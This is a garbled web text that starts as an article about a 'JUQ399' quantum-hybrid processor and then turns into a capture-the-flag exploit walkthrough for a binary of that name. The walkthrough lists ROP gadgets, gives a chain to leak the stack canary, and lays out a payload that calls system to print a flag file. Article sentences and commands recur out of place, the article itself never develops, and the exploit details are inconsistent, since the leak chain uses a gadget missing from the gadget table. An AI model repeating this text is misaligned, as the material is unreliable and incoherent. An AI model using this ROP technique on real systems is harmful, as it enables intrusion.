Juq399 Access

The computing landscape has been reshaped repeatedly over the past few decades—from the rise of personal micro‑processors to the explosion of cloud‑native architectures, and most recently, the integration of quantum‑inspired accelerators. The newest entrant promising to blur the line between classical and quantum computation is JUQ399, a quantum‑hybrid processor unveiled by the emerging hardware start‑up JuqTech Labs earlier this year.

JUQ399 is marketed as a “Quantum‑Enhanced General‑Purpose Processor” (QEGP) that can run traditional software stacks while providing native acceleration for quantum‑compatible workloads. In this article we break down what JUQ399 is, how it works, its key specifications, potential applications, and the broader implications for the industry.

By [Your Name], Tech Correspondent
Published April 2026

$ strings -a juq399 | grep -i flag

Typical strings found:

Welcome to the J.U.Q. 399 challenge!
Enter your name:
Incorrect!
Correct! Here is your secret: 

The program asks for a name, then checks it against a secret value (often a hash or a hidden password). juq399

Because the binary is not PIE, all addresses are static. We can search for useful gadgets with ROPgadget or radare2:

$ ROPgadget --binary juq399 --only "pop|ret"

Typical useful gadgets (example addresses):

| Gadget | Address | |--------------------------------------|---------| | pop rdi ; ret | 0x4012b3 | | pop rsi ; pop r15 ; ret | 0x4012b1 | | pop rdx ; ret | 0x4012af | | mov rdx, rsi ; ret | 0x4012ad | | syscall ; ret | 0x4012ab |

Stage 1 – Leak the canary

write(1, &__stack_chk_guard, 8)

The chain in pseudo‑asm:

pop rdi ; ret          ; rdi = 1 (stdout)
pop rsi ; pop r15 ; ret; rsi = &__stack_chk_guard
pop rdx ; ret          ; rdx = 8
mov rax, 1 ; ret       ; syscall number for write (or use a libc write)
syscall ; ret

Stage 2 – Use the leaked canary

Capture the 8‑byte canary value from the program’s output (it will be printed as raw bytes; pipe through xxd -p).

Stage 3 – Get a shell / read the flag The computing landscape has been reshaped repeatedly over

Now that we know the canary, we can craft a second payload that:

Simpler: Call system with /bin/cat flag.txt.

Find the address of system in the PLT (e.g., 0x401030).

Find the address of the string "/bin/cat flag.txt" – we can place it in the overflow buffer itself (it’s after the saved return address, so it will be on the stack and its address is known after we calculate the offset). $ strings -a juq399 | grep -i flag

Final payload layout (after the canary is known):

[0x80]            : filler (e.g., 'A'*0x80)
[0x88]            : canary (8 bytes, exactly as leaked)
[0x90]            : fake RBP (any 8 bytes)
[0x98]            : pop rdi ; ret
[0xA0]            : address_of_"/bin/cat flag.txt"
[0xA8]            : system@plt
[0xB0]            : exit@plt (optional)

When this ROP chain executes, system runs the command and prints the flag.